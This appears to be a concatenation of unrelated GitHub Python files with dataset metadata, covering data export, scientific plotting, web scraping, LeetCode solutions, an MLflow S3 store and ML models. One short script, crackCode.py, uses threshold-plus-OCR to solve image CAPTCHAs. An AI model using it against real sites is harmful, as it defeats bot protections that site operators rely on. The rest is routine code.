asyncio.sleep(0)\n\nasyncio.run(App().exec())","repo_name":"h0uter/situational-graph","sub_path":"experiments/async_tk.py","file_name":"async_tk.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"74720983295","text":"#!/usr/bin/python3\n\"\"\"\nUsing what you did in the task #0, extend your Python script to export data\nin the CSV format.\nRequirements:\n    - Records all tasks that are owned by this employee\n    - Format must be: \"USER_ID\",\"USERNAME\",\"TASK_COMPLETED_STATUS\",\n      \"TASK_TITLE\"\n    - File name must be: USER_ID.csv\n\"\"\"\nimport csv\nimport requests\nimport sys\n\nif __name__ == \"__main__\":\n    uid = sys.argv[1]\n    url = \"https://jsonplaceholder.typicode.com\"\n\n    user_url = f\"{url}/users/{uid}\"\n    user_resp = requests.get(user_url)\n    user_json = user_resp.json()\n    todo_url = f\"{url}/todos?userId={uid}\"\n    todo_resp = requests.get(todo_url)\n    todo_json = todo_resp.json()\n\n    filename = f\"{uid}.csv\"\n    with open(filename, \"w\") as f:\n        csv_writer = csv.writer(f, quoting=csv.QUOTE_ALL)\n        for todo in todo_json:\n\n            USER_ID = f\"{uid}\"\n            USERNAME = f\"{user_json.get('username')}\"\n            TASK_COMPLETED_STATUS = f\"{todo.get('completed')}\"\n            TASK_TITLE = f\"{todo.get('title')}\"\n\n            csv_writer.writerow([USER_ID, USERNAME, TASK_COMPLETED_STATUS,\n                                 TASK_TITLE])\n","repo_name":"FREDRICKKYEKI/alx-system_engineering-devops","sub_path":"0x15-api/1-export_to_CSV.py","file_name":"1-export_to_CSV.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71981306815","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n############################################\n#\n# PyGdalSAR: An InSAR post-processing package \n# written in Python-Gdal\n#\n############################################\n# Author        : Mathieu Volat \n############################################\n\n\n\"\"\"\\\nplot_animate_ts.py\n------------------\nPlot animated time series maps \n\nUsage: plot_animate_ts.py --cube=<path> [--vmin=<value>] [--vmax=<value>] \\\n        [--wrap=<value>] [--cpt=<value>] [--crop=<value>] [--output=<value>] \n\nOptions:\n-h --help           Show this screen.\n--cube <path>       time series displacement cube \n--vmax VALUE        Max colorscale \n--vmin VALUE        Min colorscale\n--wrap VALUE        Wrapped phase between value [default: no]\n--cpt <value>       Indicate colorscale\n--crop VALUE        Crop option [default: 
0,nlign,0,ncol]\n--output <value>    Optional saving as mp4\n\"\"\"\n\nimport sys\nimport numpy as np\nfrom osgeo import gdal\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport matplotlib.cm as cm\nimport os\n\nimport docopt\narguments = docopt.docopt(__doc__)\nif arguments[\"--cpt\"] is None:\n    cmap=cm.rainbow\nelse:\n    cmap=arguments[\"--cpt\"]\n\n# Open input dataset\nds = gdal.Open(arguments[\"--cube\"])\nif not ds:\n    exit(1)\nmd = ds.GetMetadata()\nprint(md)\n\n# Last band (should) give us a min/max displacement\nband = ds.GetRasterBand(ds.RasterCount)\nm = band.ReadAsArray(0, 0, ds.RasterXSize, ds.RasterYSize)\nif arguments[\"--crop\"] == None:\n    crop = [0,ds.RasterYSize,0,ds.RasterXSize]\nelse:\n    crop = map(float,arguments[\"--crop\"].replace(',',' ').split())\nibeg,iend,jbeg,jend = int(crop[0]),int(crop[1]),int(crop[2]),int(crop[3])\nvmax = np.nanpercentile(m[ibeg:iend,jbeg:jend], 95)\nvmin = np.nanpercentile(m[ibeg:iend,jbeg:jend], 5)\n\nif arguments[\"--vmax\"] is not None:\n    vmax = float(arguments[\"--vmax\"])\n\nif arguments[\"--vmin\"] is not None:\n    vmin = float(arguments[\"--vmin\"])\n \nif arguments[\"--wrap\"] is not None:\n    vmax=float(arguments[\"--wrap\"])\n    vmin=-vmax\n\n# Create figure\nfig = plt.figure(sys.argv[1])\n\n# Figure update function, will be used at init too\ndef f(i):\n    global ds\n    i = i % ds.RasterCount + 1\n    b = ds.GetRasterBand(i)\n    plt.title(md[\"Band_%d\"%i])\n    if arguments[\"--wrap\"] is not None:\n        los = np.mod(b.ReadAsArray()[ibeg:iend,jbeg:jend]+float(arguments[\"--wrap\"]),2*float(arguments[\"--wrap\"]))-float(arguments[\"--wrap\"])\n    else:\n        los = b.ReadAsArray()[ibeg:iend,jbeg:jend]\n    return los\n\n# Initialize\ni = 0\nim = plt.imshow(f(i), cmap=cmap, vmin=vmin, vmax=vmax, animated=True)\n\n# Animation update function\ndef updatefig(*args):\n    global i\n    i = i+1\n    im.set_array(f(i))\n    return im,\n\n# Animate\nani = animation.FuncAnimation(fig, updatefig, interval=200, blit=True)\n\nif arguments[\"--output\"] is not None:\n    base = os.path.splitext(arguments[\"--output\"])[0]\n    #Writer = animation.writers['ffmpeg']\n    #writer = Writer('fps=15',metadata=dict('Me'),bitrate=1800)\n    ani.save(base+'.mp4')\n\n# Display\nplt.colorbar()\nplt.show()\n\n","repo_name":"simondaout/PyGdalSAR","sub_path":"TimeSeries/plot_animate_ts.py","file_name":"plot_animate_ts.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"79"} +{"seq_id":"70020442175","text":"from selenium import webdriver\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\n\nclass Movie(object):\n\n    url = 'https://movie.naver.com/movie/sdb/rank/rmovie.nhn'\n    classes = ''\n    driver_path = 'C:/Program Files/Google/Chrome/chromedriver'\n    # driver = 'C://Program Files//Google//Chrome//chromedriver' (it can also be written like this)\n\n    movie_ranking = []\n    movie_dict = {}\n    df = None\n\n    def scrap(self):\n        driver = webdriver.Chrome(self.driver_path)\n        driver.get(self.url)\n        soup = BeautifulSoup(driver.page_source, 'html.parser')  # 'lxml' cannot be used here\n        all_div = soup.find_all(\"div\", {\"class\":self.classes})\n        self.movie_ranking = [{i.find(\"a\").text} for i in all_div]\n        print(self.movie_ranking)\n        driver.close()\n\n    def get_dict(self):\n        for i in range(0, len(self.movie_ranking)):\n            self.movie_dict[i] = self.movie_ranking\n        print(self.movie_dict)\n\n    def get_dataFrame(self):\n        self.df = pd.DataFrame(self.movie_dict)\n        print(self.df)\n\n    def get_csv(self):\n        path = './data/naverMusic.csv'\n        self.df.to_csv(path, 
sep=',', na_rep='Nan')\n\n\nif __name__ == '__main__':\n    movie = Movie()\n    movie.classes = input('Enter the class name')  # tit3\n    movie.scrap()\n    movie.get_dict()\n    movie.get_dataFrame()\n    movie.get_csv()\n","repo_name":"yunnyisgood/django-monaco","sub_path":"my_django/webscrap/naver_movie.py","file_name":"naver_movie.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16663852832","text":"def f(n):\n    sum = 0\n    for i in range(1,n):\n        if n % i == 0:\n            sum += i\n\n    if sum == n:\n        cnt = 1\n    else:\n        cnt = 0\n    return cnt\n\n\nx = int(input())\nb = 0\nfor i in range(2, x + 1):\n    if f(i) == 1:\n        print(i)\n        b += 1\nif b == 0:\n    print(\"There are no perfect numbers in this range.\")\n","repo_name":"incorrectrrrozya/kursovaya","sub_path":"kursovaya1/venv/3.2б.py","file_name":"3.2б.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20389327818","text":"#! /usr/bin/env python\n# encoding=utf-8\n#__author__ ='zx'\n#__time__ ='2017-10-1014:06'\n'''\nCrack the CAPTCHA (image verification code)\n'''\nfrom PIL import Image\nimport pytesseract\ndef recognize_captcha(imgpath):\n    im = Image.open(imgpath).convert(\"L\")\n    # 1. threshold the image\n    threshold = 140\n    table = []\n    for i in range(256):\n        if i < threshold:\n            table.append(0)\n        else:\n            table.append(1)\n\n    out = im.point(table, '1')\n    # out.show()\n    # 2. recognize with tesseract\n    num = pytesseract.image_to_string(out)\n    return num\n\nif __name__ == '__main__':\n    res = recognize_captcha('securityCode.jpg')\n    strs = res.split(\"\\n\")\n    if len(strs) >=1:\n        print (strs[0])\n","repo_name":"qiqiyangyang/PerformanceTest","sub_path":"crackCode.py","file_name":"crackCode.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21545729324","text":"from flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\nclass Product(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String(100), nullable=False)\n    price = db.Column(db.Float, nullable=False)\n    image = db.Column(db.String(255), nullable=False)\n    quantity = db.Column(db.Integer, nullable=False) \n\ndef init_db(app):\n    with app.app_context():\n        db.create_all()\n        if not Product.query.first():\n            products = [\n                (\"Bebidas\", 12, \"Images/bebidas.jpeg\", 10),\n                (\"Duraznos\", 20, \"Images/duraznos.webp\", 15),\n                (\"Frutas\", 35, \"Images/frutas.jpeg\", 20),\n                (\"Frutas Secas\", 22, \"Images/frutos secos.jpeg\", 5),\n                (\"Arándanos\", 27, \"Images/grapes.jpeg\", 30),\n                (\"Limones\", 18, \"Images/limonez.webp\", 50),\n                (\"Verduras\", 19, \"Images/verduras.jpeg\", 40),\n                (\"Medicamentos\", 15, \"Images/Medicamentos.webp\", 25),\n                (\"Entretenimiento\", 38, \"Images/mario-luigi-yoschi-figures-163036.jpeg\", 10)\n            ]\n            for product in products:\n                db.session.add(Product(name=product[0], price=product[1], image=product[2], quantity=product[3]))\n            db.session.commit()\n            print(\"Database created and populated with products.\")\n\ndef get_all_products():\n    return Product.query.all()\n\n\ndef get_products_by_ids(ids):\n    return Product.query.filter(Product.id.in_(ids)).all()\n","repo_name":"AntJyS/front-end-equipo-16","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7728146109","text":"class 
Solution:\n def convert(self, s: str, numRows: int) -> str:\n # (numRows - 1) * 2 elements to travel for one element to next element in same row for first row and bottom row\n if numRows == 1:\n return s\n \n res = \"\"\n increment = 2 * (numRows - 1)\n \n for r in range(numRows):\n for i in range(r, len(s), increment):\n # Row at first and last\n res += s[i]\n # Rows in between first and last row\n if (r > 0 and r < numRows - 1 and i + increment - 2 * r < len(s)):\n res += s[i + increment - 2 * r]\n return res","repo_name":"ameyxd/leetcode-interview-practice","sub_path":"6-zigzag-conversion/6-zigzag-conversion.py","file_name":"6-zigzag-conversion.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8698001401","text":"from openquake.baselib import sap\nfrom openquake.risklib.countries import code2country\n\n# example: utils/addcol.py country=VEN Exposure_Res_Venezuela.csv\n\n\ndef addcol(namevalue, fnames):\n name, value = namevalue.split('=')\n if name == 'country':\n assert value in code2country, value\n for fname in fnames:\n header, *lines = open(fname).readlines()\n out = [header.rstrip() + ',' + name]\n for line in lines:\n out.append(line.rstrip() + ',' + value)\n with open(fname, 'w') as f:\n for line in out:\n f.write(line + '\\n')\n print('Added %s to %s' % (namevalue, fname))\n\n\naddcol.namevalue = 'string of the form column_name=column_value'\naddcol.fnames = dict(help='CSV files to update', nargs='+')\n\nif __name__ == '__main__':\n sap.run(addcol)\n","repo_name":"gem/oq-engine","sub_path":"utils/addcol.py","file_name":"addcol.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":338,"dataset":"github-code","pt":"79"} +{"seq_id":"20150480192","text":"import os\n\nimport boto3\nfrom six.moves import urllib\n\nfrom mlflow.entities import FileInfo\nfrom mlflow.store.artifact_repo import ArtifactRepository\nfrom mlflow.utils.file_utils import build_path, get_relative_path, TempDir\n\n\nclass S3ArtifactRepository(ArtifactRepository):\n \"\"\"Stores artifacts on Amazon S3.\"\"\"\n\n @staticmethod\n def parse_s3_uri(uri):\n \"\"\"Parse an S3 URI, returning (bucket, path)\"\"\"\n parsed = urllib.parse.urlparse(uri)\n if parsed.scheme != \"s3\":\n raise Exception(\"Not an S3 URI: %s\" % uri)\n path = parsed.path\n if path.startswith('/'):\n path = path[1:]\n return parsed.netloc, path\n\n def log_artifact(self, local_file, artifact_path=None):\n (bucket, dest_path) = self.parse_s3_uri(self.artifact_uri)\n if artifact_path:\n dest_path = build_path(dest_path, artifact_path)\n dest_path = build_path(dest_path, os.path.basename(local_file))\n\n boto3.client('s3').upload_file(local_file, bucket, dest_path)\n\n def log_artifacts(self, local_dir, artifact_path=None):\n (bucket, dest_path) = self.parse_s3_uri(self.artifact_uri)\n if artifact_path:\n dest_path = build_path(dest_path, artifact_path)\n s3 = boto3.client('s3')\n local_dir = os.path.abspath(local_dir)\n for (root, _, filenames) in os.walk(local_dir):\n upload_path = dest_path\n if root != local_dir:\n rel_path = get_relative_path(local_dir, root)\n upload_path = build_path(dest_path, rel_path)\n for f in filenames:\n s3.upload_file(build_path(root, f), bucket, build_path(upload_path, f))\n\n def list_artifacts(self, path=None):\n (bucket, artifact_path) = self.parse_s3_uri(self.artifact_uri)\n dest_path = artifact_path\n if path:\n dest_path = build_path(dest_path, path)\n 
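To make the stride arithmetic in the convert method above concrete: for numRows = 3 the row-to-row step is increment = 2 * (numRows - 1) = 4, and each middle row r picks up one extra character at i + increment - 2 * r. A quick check using the classic example string from the problem statement:

# "PAYPALISHIRING" with numRows=3: row 0 reads indices 0, 4, 8, 12;
# row 1 reads 1, 3, 5, 7, 9, 11, 13; row 2 reads 2, 6, 10.
sol = Solution()
assert sol.convert("PAYPALISHIRING", 3) == "PAHNAPLSIIGYIR"
assert sol.convert("AB", 1) == "AB"  # numRows == 1 returns the input unchanged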
infos = []\n prefix = dest_path + \"/\"\n paginator = boto3.client('s3').get_paginator(\"list_objects_v2\")\n results = paginator.paginate(Bucket=bucket, Prefix=prefix, Delimiter='/')\n for result in results:\n # Subdirectories will be listed as \"common prefixes\" due to the way we made the request\n for obj in result.get(\"CommonPrefixes\", []):\n subdir = obj.get(\"Prefix\")[len(artifact_path)+1:]\n if subdir.endswith(\"/\"):\n subdir = subdir[:-1]\n infos.append(FileInfo(subdir, True, None))\n # Objects listed directly will be files\n for obj in result.get('Contents', []):\n name = obj.get(\"Key\")[len(artifact_path)+1:]\n size = int(obj.get('Size'))\n infos.append(FileInfo(name, False, size))\n return sorted(infos, key=lambda f: f.path)\n\n def download_artifacts(self, artifact_path):\n with TempDir(remove_on_exit=False) as tmp:\n return self._download_artifacts_into(artifact_path, tmp.path())\n\n def _download_artifacts_into(self, artifact_path, dest_dir):\n \"\"\"Private version of download_artifacts that takes a destination directory.\"\"\"\n basename = os.path.basename(artifact_path)\n local_path = build_path(dest_dir, basename)\n listing = self.list_artifacts(artifact_path)\n if len(listing) > 0:\n # Artifact_path is a directory, so make a directory for it and download everything\n os.mkdir(local_path)\n for file_info in listing:\n self._download_artifacts_into(file_info.path, local_path)\n else:\n (bucket, s3_path) = self.parse_s3_uri(self.artifact_uri)\n s3_path = build_path(s3_path, artifact_path)\n boto3.client('s3').download_file(bucket, s3_path, local_path)\n return local_path\n","repo_name":"rstudio/mlflow-original","sub_path":"mlflow/store/s3_artifact_repo.py","file_name":"s3_artifact_repo.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"79"} +{"seq_id":"44688781245","text":"# Url: https://leetcode.com/problems/add-binary/\n# Related Topics:\n# String\n\n# Example:\n# Input: a = \"1010\", b = \"1011\"\n# Output: \"10101\"\n\n\nclass Solution:\n def addBinary(self, a, b):\n \"\"\"\n :type a: str\n :type b: str\n :rtype: str\n \"\"\"\n len_a, len_b = len(a), len(b)\n a, b = a[::-1], b[::-1]\n ans = \"\"\n i, j, inc = 0, 0, 0\n while i < len_a or j < len_b:\n i_a = int(a[i]) if i < len_a else 0\n j_b = int(b[j]) if j < len_b else 0\n cur = i_a + j_b + inc\n inc, cur = cur // 2, cur % 2\n ans += str(cur)\n i += 1\n j += 1\n if inc:\n ans += str(inc)\n return ans[::-1]\n ","repo_name":"EVASHINJI/LeetCode","sub_path":"Daily/67 Add Binary.py","file_name":"67 Add Binary.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13104837571","text":"#!/usr/bin/env python\n#\n# Warmup Elasticsearch tracks index.\n#\n# Usage: cut -f2 -d'|' datas/tracks.* | python warmup.py\n#\n# Example (search for 1k top popular tracks):\n# sort -rnk3 -t'|' datas/tracks.* | head -n 1000 | cut -f2 -d'|' | sort | uniq | python bin/warmup.py\n#\n\nimport re\nimport fileinput\n\nfrom elasticsearch import Elasticsearch\n\nes = Elasticsearch()\n\nfor keywords in fileinput.input():\n keywords = keywords.strip(' \\t\\n\\r')\n keywords = re.sub('[^A-Za-z0-9 ]+', '', keywords).lower()\n\n print(keywords)\n\n pos = 1\n for char in keywords:\n print(keywords[:pos])\n pos += 1\n\n query = {\n \"query\": {\n \"match\": {\n \"name_autocomplete\": keywords[:pos]\n }\n }\n }\n\n print(es.search(index=\"tracks\", 
body=query))\n","repo_name":"adrienschuler-zz/deez","sub_path":"bin/warmup.py","file_name":"warmup.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"25751902000","text":"import collections, math, bisect, heapq, random, functools, itertools, copy, typing\nimport platform; LOCAL = (platform.uname().node == 'AMO')\n\n\nimport sys; input = lambda: sys.stdin.readline().rstrip(\"\\r\\n\")\ninp = lambda f=int: list(map(f, input().split()))\n\ndef make_arr(*args):\n def func(x):\n if len(args) == 1: return [x() for _ in range(args[0])]\n return [make_arr(*args[1:])(x) for _ in range(args[0])]\n return func\n\ndef debug(*args):\n if LOCAL:\n print('\\033[92m', end='')\n printf(*args)\n print('\\033[0m', end='')\n\ndef printf(*args):\n if LOCAL:\n print('>>>: ', end='')\n for arg in args:\n if isinstance(arg, typing.Iterable) and \\\n not isinstance(arg, str) and \\\n not isinstance(arg, dict):\n print(' '.join(map(str, arg)), end=' ')\n else:\n print(arg, end=' ')\n print()\n\n# avaliable on Google, AtCoder\n# sys.setrecursionlimit(10**6)\n# import numpy as np\n# import scipy\n\n# d4 = [(1,0),(0,1),(-1,0),(0,-1)]\n# d8 = [(1,0),(1,1),(0,1),(-1,1),(-1,0),(-1,-1),(0,-1),(1,-1)]\n# d6 = [(2,0),(1,1),(-1,1),(-2,0),(-1,-1),(1,-1)] # hexagonal layout\nclass Encodict:\n def __init__(self, func=lambda : 0):\n self.RANDOM = random.randint(0, 1<<32)\n self.default = func\n self.dict = {}\n \n def __getitem__(self, key):\n k = self.RANDOM ^ key\n if k not in self.dict:\n self.dict[k] = self.default()\n return self.dict[k]\n \n def __setitem__(self, key, item):\n k = self.RANDOM ^ key\n self.dict[k] = item\n\n def keys(self):\n return [self.RANDOM ^ i for i in self.dict]\n \n def items(self):\n return [(self.RANDOM ^ i, self.dict[i]) for i in self.dict]\n \n def sorted(self, by_value=False, reverse=False):\n if by_value:\n self.dict = dict(sorted(self.dict.items(), \\\n key=lambda x:x[1], reverse=reverse))\n else:\n self.dict = dict(sorted(self.dict.items(), \\\n key=lambda x:self.RANDOM^x[0], reverse=reverse))\n\ndef sixface(x, y, z, a, b, c, i):\n ret = [\n (x, y, z, a, b, z, i),\n (x, y, z, a, y, c, i),\n (x, y, z, x, b, c, i),\n (x, y, c, a, b, c, i),\n (x, b, z, a, b, c, i),\n (a, y, z, a, b, c, i)\n ]\n return ret\n\ndef solve(cas):\n n, = inp()\n x = Encodict(list)\n y = Encodict(list)\n z = Encodict(list)\n all_cubes = []\n d = {}\n \n for i in range(n):\n coords = inp()\n all_cubes.append(coords)\n for f in sixface(*coords, i):\n if f[0] == f[3]:\n x[f[0]].append(f)\n if f[1] == f[4]:\n y[f[1]].append(f)\n if f[2] == f[5]:\n z[f[2]].append(f)\n \n def check(x0, y0, a0, b0, x1, y1, a1, b1):\n if x1 >= x0 and y1 >= y0 and x1 < a0 and y1 < b0:\n return True\n if a1 > x0 and b1 > y0 and a1 <= a0 and b1 <= b0:\n return True\n if x0 >= x1 and y0 >= y1 and x0 < a1 and y0 < b1:\n return True \n if a0 > x1 and b0 > y1 and a0 <= a1 and b0 <= b1:\n return True\n return False\n \n \n for xx in x.keys():\n for i in range(1, len(x[xx])):\n for j in range(i):\n if check(x[xx][i][1], x[xx][i][2], x[xx][i][4],x[xx][i][5],x[xx][j][1], x[xx][j][2], x[xx][j][4],x[xx][j][5]):\n debug(x[xx][i], x[xx][j])\n d[x[xx][i]] = d.get(x[xx][i], 0) + 1\n d[x[xx][j]] = d.get(x[xx][j], 0) + 1\n for yy in y.keys():\n for i in range(1, len(y[yy])):\n for j in range(i):\n if check(y[yy][i][0], y[yy][i][2], y[yy][i][3],y[yy][i][5],y[yy][j][0], y[yy][j][2], y[yy][j][3],y[yy][j][5]):\n debug(y[yy][i], y[yy][j])\n d[y[yy][i]] = 
d.get(y[yy][i], 0) + 1\n d[y[yy][j]] = d.get(y[yy][j], 0) + 1\n\n for zz in z.keys():\n for i in range(1, len(z[zz])):\n for j in range(i):\n if check(z[zz][i][0], z[zz][i][1], z[zz][i][3],z[zz][i][4],z[zz][j][0], z[zz][j][1], z[zz][j][3],z[zz][j][4]):\n debug(z[zz][i], z[zz][j])\n d[z[zz][i]] = d.get(z[zz][i], 0) + 1\n d[z[zz][j]] = d.get(z[zz][j], 0) + 1\n debug(d)\n for i, coords in enumerate(all_cubes):\n faces = sixface(*coords, i)\n tot = 0\n for f in faces:\n tot += d.get(f, 0)\n print(tot)\n\ncas = 1\nfor _ in range(cas):\n solve(_)\n\n","repo_name":"amomorning/online-challenges","sub_path":"atcoder/abc312/e_tle.py","file_name":"e_tle.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"23499314992","text":"import csv\r\nimport random\r\n\r\n\r\ndef train_test(dataset, test_state):\r\n test_ratio = 100 * test_state\r\n train_ratio = 100 - test_ratio\r\n training_set, testing_set = [], []\r\n # dataset=[]\r\n c = 0\r\n ''' with open('tree/xss.csv') as tsv:\r\n for line in csv.reader(tsv, delimiter=\",\"): \r\n data.append(list(line))'''\r\n # ........Removing list with same values......\r\n ''' for d in data:\r\n if d not in dataset:\r\n dataset.append(d)'''\r\n len_train = (len(dataset) * train_ratio) / 100\r\n len_test = len(dataset) - len_train\r\n # random.shuffle(data)\r\n # .....Splitting the dataset.......\r\n for i in range(int(len_train)):\r\n training_set.append(dataset[i])\r\n c += 1\r\n print(len_train, c)\r\n for i in range(int(len_train), len(dataset)):\r\n # if dataset[i] not in training_set:\r\n testing_set.append(dataset[i])\r\n\r\n return training_set, testing_set\r\n\r\n\r\ndata = []\r\nwith open('xssed.csv') as tsv:\r\n for line in csv.reader(tsv, delimiter=','):\r\n data.append(list(line))\r\ntraining_data, testing_data = train_test(data, 0.2)\r\nprint(len(training_data), len(testing_data))\r\n","repo_name":"NaveenBJacob/Website-risk-prediction-and-prevention","sub_path":"data_split.py","file_name":"data_split.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10017115690","text":"\n\nimport logging\nfrom datetime import datetime\nfrom datetime import timedelta\n\nimport h5netcdf\nimport numpy as np\nimport xarray as xr\nimport dask.array as da\n\nfrom pyresample.utils import get_area_def\nfrom satpy.dataset import Dataset\nfrom satpy.readers.file_handlers import BaseFileHandler\nfrom satpy.utils import proj_units_to_meters\nfrom satpy import CHUNK_SIZE\nlogger = logging.getLogger(__name__)\n\nPLATFORM_NAMES = {'MET-08': 'Meteosat-8',\n 'MET-09': 'Meteosat-9',\n 'MET-10': 'Meteosat-10',\n 'MET-11': 'Meteosat-11', }\n\n\nclass NcLIFileHandler(BaseFileHandler):\n\n \"\"\"MSG OCA NetCDF reader.\"\"\"\n\n def __init__(self, filename, filename_info, filetype_info):\n \"\"\"Init method.\"\"\"\n super(NcLIFileHandler, self).__init__(filename, filename_info,\n filetype_info)\n\n self.nc = xr.open_dataset(self.filename,\n decode_cf=True,\n mask_and_scale=False,\n chunks={'pixels': CHUNK_SIZE})\n\n# import pdb; pdb.set_trace()\n self.nc.attrs['x'] = 5568\n self.nc.attrs['y'] = 5568\n\n self.nc = self.nc.rename({'pixels': 'x', 'pixels': 'y'})\n\n # the processing_time is taken from the filename, however could be taken from remote_sensing_start_time if/when attribute is set properly.\n # self.processing_time = 
filename_info['year']+'-'+filename_info['month']+'-'+filename_info['day']+'T'+filename_info['hour']+':'+filename_info['min']+':00Z'\n self.processing_time = '2018-11-01T12:00:00Z'\n# %Y-%m-%dT%H:%M:%SZ\n# print(self.%Y-%m-%dT%H:%M:%SZnc)\n\n # self.sensor = self.nc.attrs['instrument']\n self.sensor = 'SEVIRI'\n # sat_id = str(self.nc.attrs['spacecraft'])\n sat_id = 'MET-10'\n\n self.mda = {}\n self.mda['projection_parameters'] = {'a': '6378169.0',\n 'b': '6356583.8',\n 'h': 35785831.00,\n 'ssp_longitude': '0.0'}\n\n self.mda['number_of_lines'] = self.nc.attrs['y']\n self.mda['number_of_columns'] = self.nc.attrs['x']\n\n try:\n self.platform_name = PLATFORM_NAMES[sat_id]\n except KeyError:\n self.platform_name = PLATFORM_NAMES[sat_id.astype(str)]\n\n def get_dataset(self, dataset_id, dataset_info):\n\n z = self.nc[dataset_info['nc_key']]\n\n xvals = np.array(self.nc['x'])\n yvals = np.array(self.nc['y'])\n a = da.from_array(np.zeros([5568, 5568]), chunks=CHUNK_SIZE)\n a = np.zeros([5568, 5568])\n a[(5568-yvals), (xvals)] = np.array(z)\n a[a == 0] = np.nan\n\n dataset = xr.DataArray(da.from_array(a, chunks=CHUNK_SIZE), dims=['y', 'x']).astype(np.int16)\n\n dataset.attrs.update(dataset_info)\n\n dataset.attrs['_FillValue'] = np.nan\n\n return dataset\n\n def get_area_def(self, dsid):\n a = self.mda['projection_parameters']['a']\n b = self.mda['projection_parameters']['b']\n h = self.mda['projection_parameters']['h']\n lon_0 = self.mda['projection_parameters']['ssp_longitude']\n\n proj_dict = {'a': float(a),\n 'b': float(b),\n 'lon_0': float(lon_0),\n 'h': float(h),\n 'proj': 'geos',\n 'units': 'm'}\n\n nlines = self.mda['number_of_lines']\n ncols = self.mda['number_of_columns']\n\n area_extent = (-5570248.477339745,\n -5567248.074173927,\n 5567248.074173927,\n 5570248.477339745)\n\n area = get_area_def('some_area_name',\n \"On-the-fly area\",\n 'geosmsg',\n proj_dict,\n ncols,\n nlines,\n area_extent)\n\n return area\n\n @property\n def start_time(self):\n try:\n\n return datetime.strptime(self.processing_time,\n '%Y-%m-%dT%H:%M:%SZ')\n\n except TypeError:\n\n return datetime.strptime(\n self.processing_time.astype(str),\n '%Y-%m-%dT%H:%M:%SZ')\n\n @property\n def end_time(self):\n try:\n\n minutes = timedelta(minutes=15)\n return datetime.strptime(self.processing_time,\n '%Y-%m-%dT%H:%M:%SZ')+minutes\n except TypeError:\n\n return datetime.strptime(\n self.processing_time.astype(str),\n '%Y-%m-%dT%H:%M:%SZ')+minutes\n","repo_name":"manucarran/satpy-localReaders","sub_path":"nc_mtg_li.py","file_name":"nc_mtg_li.py","file_ext":"py","file_size_in_byte":4842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70236706817","text":"import math\nimport numbers\nimport os.path as osp\n\nimport mmcv\nimport torch\n\nfrom mmedit.core import tensor2img\nfrom ..registry import MODELS\nfrom .basic_restorer import BasicRestorer\n\n\n@MODELS.register_module()\nclass LIIF(BasicRestorer):\n \"\"\"LIIF model for single image super-resolution.\n\n Paper: Learning Continuous Image Representation with\n Local Implicit Image Function\n\n Args:\n generator (dict): Config for the generator.\n pixel_loss (dict): Config for the pixel loss.\n rgb_mean (tuple[float]): Data mean.\n Default: (0.5, 0.5, 0.5).\n rgb_std (tuple[float]): Data std.\n Default: (0.5, 0.5, 0.5).\n train_cfg (dict): Config for train. Default: None.\n test_cfg (dict): Config for testing. Default: None.\n pretrained (str): Path for pretrained model. 
Default: None.\n \"\"\"\n\n def __init__(self,\n generator,\n pixel_loss,\n rgb_mean=(0.5, 0.5, 0.5),\n rgb_std=(0.5, 0.5, 0.5),\n train_cfg=None,\n test_cfg=None,\n pretrained=None):\n super().__init__(\n generator,\n pixel_loss,\n train_cfg=train_cfg,\n test_cfg=test_cfg,\n pretrained=pretrained)\n\n # norm\n rgb_mean = torch.FloatTensor(rgb_mean)\n rgb_std = torch.FloatTensor(rgb_std)\n self.lq_mean = rgb_mean.view(1, -1, 1, 1)\n self.lq_std = rgb_std.view(1, -1, 1, 1)\n self.gt_mean = rgb_mean.view(1, 1, -1)\n self.gt_std = rgb_std.view(1, 1, -1)\n\n def train_step(self, data_batch, optimizer):\n \"\"\"Train step.\n\n Args:\n data_batch (dict): A batch of data, which requires\n 'coord', 'lq', 'gt', 'cell'\n optimizer (obj): Optimizer.\n\n Returns:\n dict: Returned output, which includes:\n log_vars, num_samples, results (lq, gt and pred).\n \"\"\"\n # data\n coord = data_batch['coord']\n cell = data_batch['cell']\n lq = data_batch['lq']\n gt = data_batch['gt']\n\n # norm\n self.lq_mean = self.lq_mean.to(lq)\n self.lq_std = 